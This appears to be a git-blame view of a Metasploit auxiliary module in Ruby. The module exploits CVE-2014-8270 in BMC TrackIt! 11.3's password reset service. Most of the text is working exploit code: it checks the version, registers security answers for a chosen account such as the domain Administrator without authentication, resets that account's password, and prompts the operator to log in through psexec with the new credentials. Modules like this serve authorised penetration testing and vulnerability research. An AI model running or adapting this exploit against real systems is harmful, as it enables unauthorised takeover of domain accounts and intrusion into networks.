2014-12-11 00:54:37 +00:00
|
|
|
##
|
2014-12-11 16:59:43 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-12-11 00:54:37 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit4 < Msf::Auxiliary
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
2014-12-11 22:44:48 +00:00
|
|
|
include Msf::Auxiliary::Scanner
|
2014-12-11 00:54:37 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
2014-12-11 23:05:21 +00:00
|
|
|
super(update_info(
|
|
|
|
info,
|
2014-12-13 19:01:41 +00:00
|
|
|
'Name' => 'BMC TrackIt! Unauthenticated Arbitrary User Password Change',
|
2014-12-11 23:05:21 +00:00
|
|
|
'Description' => %q(
|
2014-12-11 00:54:37 +00:00
|
|
|
This module exploits a flaw in the password reset mechanism in BMC TrackIt! 11.3
|
2014-12-13 19:01:41 +00:00
|
|
|
and possibly prior versions. If the password reset service is configured to use
|
|
|
|
a domain administrator (which is the recommended configuration), then domain
|
|
|
|
credentials can be reset (such as domain Administrator).
|
2014-12-11 23:05:21 +00:00
|
|
|
),
|
2014-12-11 00:54:37 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-419/'],
|
|
|
|
['CVE', '2014-8270']
|
|
|
|
],
|
|
|
|
'Author' =>
|
|
|
|
[
|
2014-12-13 19:01:41 +00:00
|
|
|
'bperry', # discovery/metasploit module,
|
|
|
|
'jhart'
|
2014-12-11 00:54:37 +00:00
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'DisclosureDate' => "Dec 9 2014"
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('TARGETURI', [true, 'The path to BMC TrackIt!', '/']),
|
2014-12-13 19:01:41 +00:00
|
|
|
OptString.new('LOCALUSER', [true, 'The user to change password for', 'Administrator']),
|
2014-12-12 01:26:42 +00:00
|
|
|
OptString.new('LOCALPASS', [false, 'The password to set for the local user (blank for random)', '']),
|
2014-12-11 00:54:37 +00:00
|
|
|
OptString.new('DOMAIN', [false, 'The domain of the user. By default the local user\'s computer name will be autodetected', ''])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
2014-12-11 22:44:48 +00:00
|
|
|
def localuser
|
|
|
|
datastore['LOCALUSER']
|
|
|
|
end
|
|
|
|
|
2014-12-11 23:40:17 +00:00
|
|
|
def password_reset
|
2014-12-12 00:51:41 +00:00
|
|
|
begin
|
|
|
|
uri = normalize_uri(target_uri.path, 'PasswordReset')
|
|
|
|
send_request_cgi('uri' => uri)
|
|
|
|
rescue => e
|
|
|
|
vprint_error("#{peer}: unable to request #{uri}: #{e}")
|
|
|
|
nil
|
|
|
|
end
|
2014-12-11 23:33:23 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def check_host(ip)
|
|
|
|
vprint_status("#{peer}: retrieving PasswordReset page to extract Track-It! version")
|
|
|
|
|
2014-12-11 23:40:17 +00:00
|
|
|
unless (res = password_reset)
|
2014-12-12 00:51:41 +00:00
|
|
|
return
|
2014-12-11 23:33:23 +00:00
|
|
|
end
|
|
|
|
|
2014-12-12 00:53:36 +00:00
|
|
|
if res.body =~ /<title>Track-It! Password Reset/i
|
|
|
|
version = res.body.scan(/\bBuild=([\d\.]+)/).flatten.first
|
2014-12-11 23:33:23 +00:00
|
|
|
if version
|
|
|
|
fix_version = '11.4'
|
|
|
|
if Gem::Version.new(version) < Gem::Version.new(fix_version)
|
|
|
|
report_vuln(
|
2014-12-11 23:40:17 +00:00
|
|
|
host: ip,
|
|
|
|
port: rport,
|
|
|
|
name: name,
|
|
|
|
info: "Module #{fullname} detected Track-It! version #{version}",
|
|
|
|
refs: references
|
2014-12-11 23:33:23 +00:00
|
|
|
)
|
|
|
|
vprint_status("#{peer}: Track-It! version #{version} is less than #{fix_version}")
|
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
else
|
|
|
|
vprint_status("#{peer}: Track-It! version #{version} is not less than #{fix_version}")
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
else
|
2014-12-11 23:47:26 +00:00
|
|
|
vprint_error("#{peer}: unable to get Track-It! version")
|
2014-12-11 23:33:23 +00:00
|
|
|
return Exploit::CheckCode::Unknown
|
|
|
|
end
|
|
|
|
else
|
2014-12-11 23:47:26 +00:00
|
|
|
vprint_status("#{peer}: does not appear to be running Track-It!")
|
2014-12-11 23:33:23 +00:00
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
return unless check_host(ip) == Exploit::CheckCode::Vulnerable
|
|
|
|
|
2014-12-11 23:05:21 +00:00
|
|
|
if datastore['DOMAIN'].blank?
|
|
|
|
vprint_status("#{peer}: retrieving session cookie and domain name")
|
|
|
|
else
|
|
|
|
vprint_status("#{peer}: retrieving domain name")
|
|
|
|
end
|
|
|
|
|
2014-12-11 23:40:17 +00:00
|
|
|
unless (res = password_reset)
|
2014-12-11 22:44:48 +00:00
|
|
|
return
|
2014-12-11 00:54:37 +00:00
|
|
|
end
|
|
|
|
|
2014-12-11 22:30:32 +00:00
|
|
|
cookies = res.get_cookies
|
2014-12-11 23:05:21 +00:00
|
|
|
if datastore['DOMAIN'].blank?
|
|
|
|
if res.body =~ /"domainName":"([^"]*)"/
|
|
|
|
domain = Regexp.last_match(1)
|
|
|
|
vprint_status("#{peer}: found domain name: #{domain}")
|
|
|
|
else
|
|
|
|
print_error("#{peer}: unable to obtain domain name. Try specifying DOMAIN")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
else
|
|
|
|
domain = datastore['DOMAIN']
|
|
|
|
end
|
2014-12-11 00:54:37 +00:00
|
|
|
|
2014-12-11 23:45:59 +00:00
|
|
|
full_user = "#{domain}\\#{localuser}"
|
2014-12-12 01:16:43 +00:00
|
|
|
vprint_status("#{peer}: registering #{full_user}")
|
2014-12-12 01:10:33 +00:00
|
|
|
answers = [ Rex::Text.rand_text_alpha(8), Rex::Text.rand_text_alpha(8) ]
|
2014-12-11 22:44:48 +00:00
|
|
|
res = send_request_cgi(
|
2014-12-11 00:54:37 +00:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'PasswordReset', 'Application', 'Register'),
|
|
|
|
'method' => 'POST',
|
2014-12-11 22:30:32 +00:00
|
|
|
'cookie' => cookies,
|
2014-12-11 00:54:37 +00:00
|
|
|
'vars_post' => {
|
|
|
|
'domainname' => domain,
|
2014-12-11 22:44:48 +00:00
|
|
|
'userName' => localuser,
|
2014-12-11 00:54:37 +00:00
|
|
|
'emailaddress' => Rex::Text.rand_text_alpha(8) + '@' + Rex::Text.rand_text_alpha(8) + '.com',
|
2014-12-12 01:10:33 +00:00
|
|
|
'userQuestions' => %Q([{"Id":1,"Answer":"#{answers.first}"},{"Id":2,"Answer":"#{answers.last}"}]),
|
2014-12-11 00:54:37 +00:00
|
|
|
'updatequesChk' => 'false',
|
|
|
|
'SelectedQuestion' => 2,
|
2014-12-12 01:10:33 +00:00
|
|
|
'answer' => answers.last,
|
|
|
|
'confirmanswer' => answers.last
|
2014-12-11 00:54:37 +00:00
|
|
|
}
|
2014-12-11 22:44:48 +00:00
|
|
|
)
|
2014-12-11 00:54:37 +00:00
|
|
|
|
2014-12-11 22:44:48 +00:00
|
|
|
if !res || res.body != "{\"success\":true,\"data\":{\"userUpdated\":true}}"
|
2014-12-12 01:16:43 +00:00
|
|
|
print_error("#{peer}: Could not register #{full_user}")
|
2014-12-11 22:44:48 +00:00
|
|
|
return
|
2014-12-11 00:54:37 +00:00
|
|
|
end
|
|
|
|
|
2014-12-12 01:16:43 +00:00
|
|
|
vprint_status("#{peer}: changing password for #{full_user}")
|
2014-12-12 01:26:42 +00:00
|
|
|
|
|
|
|
if datastore['LOCALPASS'].blank?
|
|
|
|
password = Rex::Text.rand_text_alpha(10) + "!1"
|
|
|
|
else
|
|
|
|
password = datastore['LOCALPASS']
|
|
|
|
end
|
|
|
|
|
2014-12-11 23:05:21 +00:00
|
|
|
res = send_request_cgi(
|
2014-12-11 00:54:37 +00:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'PasswordReset', 'Application', 'ResetPassword'),
|
|
|
|
'method' => 'POST',
|
2014-12-11 22:30:32 +00:00
|
|
|
'cookie' => cookies,
|
2014-12-11 00:54:37 +00:00
|
|
|
'vars_post' => {
|
|
|
|
'newPassword' => password,
|
|
|
|
'domain' => domain,
|
2014-12-11 22:44:48 +00:00
|
|
|
'UserName' => localuser,
|
2014-12-11 00:54:37 +00:00
|
|
|
'CkbResetpassword' => 'true'
|
|
|
|
}
|
2014-12-11 23:05:21 +00:00
|
|
|
)
|
2014-12-11 00:54:37 +00:00
|
|
|
|
2014-12-11 22:44:48 +00:00
|
|
|
if !res || res.body != '{"success":true,"data":{"PasswordResetStatus":0}}'
|
2014-12-11 23:45:59 +00:00
|
|
|
print_error("#{peer}: Could not change #{full_user}'s password -- is it a domain or local user?")
|
2014-12-11 22:44:48 +00:00
|
|
|
return
|
2014-12-11 00:54:37 +00:00
|
|
|
end
|
|
|
|
|
2014-12-11 23:45:59 +00:00
|
|
|
report_vuln(
|
|
|
|
host: ip,
|
|
|
|
port: rport,
|
|
|
|
name: name,
|
2014-12-12 00:59:21 +00:00
|
|
|
info: "Module #{fullname} changed #{full_user}'s password to #{password}",
|
2014-12-11 23:45:59 +00:00
|
|
|
refs: references
|
|
|
|
)
|
|
|
|
print_good("#{peer}: Please run the psexec module using #{full_user}:#{password}")
|
2014-12-11 00:54:37 +00:00
|
|
|
end
|
|
|
|
end
|